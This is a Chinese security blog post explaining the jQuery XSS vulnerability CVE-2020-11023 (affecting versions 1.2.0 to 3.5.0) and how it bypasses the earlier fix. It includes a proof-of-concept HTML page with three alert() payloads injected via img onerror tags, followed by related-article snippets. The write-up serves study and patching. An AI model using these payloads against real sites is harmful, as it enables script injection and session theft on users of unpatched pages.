Jquery XSS漏洞(CVE-2020-11023)

最新推荐文章于 2025-05-13 13:19:36 发布
原创 最新推荐文章于 2025-05-13 13:19:36 发布 · 7.8k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了jQuery的CVE-2020-11023跨站脚本(XSS)漏洞,包括漏洞的成因、影响范围及如何利用。修复CVE-2020-11022的尝试未能完全解决问题,因为某些HTML标签如`<option>`在特定情况下仍可能导致XSS攻击。利用漏洞的payload展示了如何绕过防护,通过插入带有恶意代码的`<option>`标签触发XSS。受影响的jQuery版本为1.2.0到3.5.0。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞详情

针对CVE-2020-11022漏洞,jQuery Team进行了修复。修复手段为将$.htmlPrefilter()方法替换为标识函数,因此传递的HTML字符串现在不再经过htmlPrefilter函数处理。但是这个修复方法仍有一些手段可以绕过,CVE-2020-11023就是针对CVE-2020-11022的绕过。

漏洞影响

V 1.2.0 <= jquery < V 3.5.0

漏洞详情

绕过使用的是另一个特性,某些特殊的标签在经过html()方法处理时,会由于HTML的特性或浏览器的bug而使得这些标签被移除。

 

option就是这些特殊标签之一,我们知道option 元素通过位于 select 元素内部来构造一个选择列表,但如果没有select元素,option会被移除。为了解决这个bug,如果传入参数的第一个元素为option,jQuery会新增<select multiple='multiple’>和</select>。

 

所以可以构造如下payload:

<option><style></option></select><imgsrc=x onerror=alert(3)></style>

 

经过处理会变为:

<select multiple='multiple'><option><style></option></select><imgsrc=x onerror=alert(3)></style></select>

 

根据HTML从前往后解析的顺序,会先解析一个<select>标签,且<select>不允许将大部分HTML标签包裹其中,导致<style>被忽略,而后识别<img>标签从而xss。

漏洞利用

image.png

html页面代码如下:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(1)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert(2)>">
</xmp>

<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert(3)></style>
</xmp>

<div id="div"></div>
</body>
</html>

参考:

https://mp.weixin.qq.com/s/QW5v5d7829m0Pz6AA6_XPQ

 

复现CVE-2020-11022/11023jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 7209
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
Drupal漏洞复现:CVE-2019-6341
weixin_59086772的博客
12-30 2475
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
JQuery跨站脚本漏洞
qq274575499的博客
04-02 4361
jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
2401_85013983的博客
05-14 1310
【代码】jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现。
CVE-2020-11023】——漏洞复现、原理分析以及漏洞修复
IronmanJay
10-27 9270
jQuery版本1.0.3到3.5.0之间(包括1.0.3,但不包括3.5.0),将包含``元素的HTML(即使已进行消毒处理)从不受信任的来源传递给jQuery的某些DOM操作方法(如`.html()`、`.append()`等)可能会导致执行不受信任的代码。该问题在jQuery 3.5.0中已得到修复。
JQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023漏洞复现】
一纸荒芜的博客
10-31 2万+
jquery-xss漏洞复现
jQuery漏洞——CVE-2020-11022/CVE-2020-11023,保姆篇---春不晚
weixin_71913298的博客
12-11 4245
实践是检验真理的唯一标准,请大家积极实践 请大家指出的我问题和需要完善的地方,咱们共同进步 清风.春不晚与诸君共勉,共创辉煌篇章
rabbitmq出现jQuery漏洞——CVE-2020-11022/CVE-2020-11023
07-09
CVE-2020-11022 和 CVE-2020-11023jQuery 3.5.0 及以下版本中存在的安全漏洞,可能导致跨站脚本攻击(XSS)或执行恶意脚本[^2]。 由于 RabbitMQ 的官方镜像通常使用固定版本的前端资源,并且不提供直接更新前端...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
CVE-2020-11023 漏洞的复现步骤和环境搭建方法是什么?
最新发布
07-22
CVE-2020-11023是另一个XSS漏洞,同样在jQuery 3.5.0之前版本中存在。 根据引用[1],这两个漏洞都是跨站脚本漏洞XSS),影响jQuery 1.2及以上版本,直到3.5.0版本才被修复。 CVE-2020-11023漏洞的具体情况:当...
2024年最全webstorm的安装及基本配置,2024最新物联网嵌入式开发高频精选面试题分享
2401_85015025的博客
05-14 689
择“License server”,然后在输入框中输入 License server address 为:http://hb5.s.osidea.cc:1017(有可能不能用,自己可以百度搜一下最新的)点击”Activate”按钮。人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**各种配置 可以根据自己的需求自行配置。7、开始基本配置 主要在。
安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析
IT全栈 华强工作室
09-07 6383
代码安全扫描阶段,前端资源审计发现jQuery版本过低导致生产系统存在类风险。该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄露、账户被劫持、会话被劫持等安全问题。科运中心给出的解决方案是升级jQuery版本至3.5.0或更高版本。
JQuery XSS漏洞(CVE-2020-11022/11023)
ZPFCD的博客
01-19 3265
漏洞源于WEB应用缺少对客户端数据的正确验证。 影响版本: 1.2.0 <= jquery < V 3.5.0 测试代码: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title> <script sr.
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023
jQuery框架漏洞全总结及开发建议
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
jquery 上传文件_jQuery框架漏洞全总结及开发建议
weixin_39778106的博客
11-29 847
一、jQuery简介jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了...
jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023
热门推荐
Tracts的博客
03-10 2万+
jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023 漏洞号:CVE-2020-11022/CVE-2020-11023 影响范围:jQuery >= 1.0.3 < 3.5.0 漏洞原理 见:jQuery最新xss漏洞分析——CVE-2020-11022/11023 - 云+社区 - 腾讯云 (tencent.com) 漏洞复现 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 要想在项目本地实
Web安全-JQuery框架XSS漏洞浅析
道阻且长,行则将至
01-23 2万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
jQuery 常见安全漏洞全景解析:从 XSS 到 AJAX 风险,权威修复指南
专注于 Java 后端架构、微服务、分布式、前端及 AI 领域的技术分享,是开发者获取硬核知识、交流实战经验的专业博客。
05-13 1642
jQuery 的安全风险本质是 “动态操作用户输入” 与 “前端信任边界” 的冲突。通过升级到安全版本严格过滤输入输出前后端协同防护,可有效规避 90% 以上的 jQuery 相关漏洞。对于关键业务系统,建议定期进行安全扫描(如 OWASP ZAP),并加入漏洞响应计划,确保系统持续安全。权威资料索引NVD - Home。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值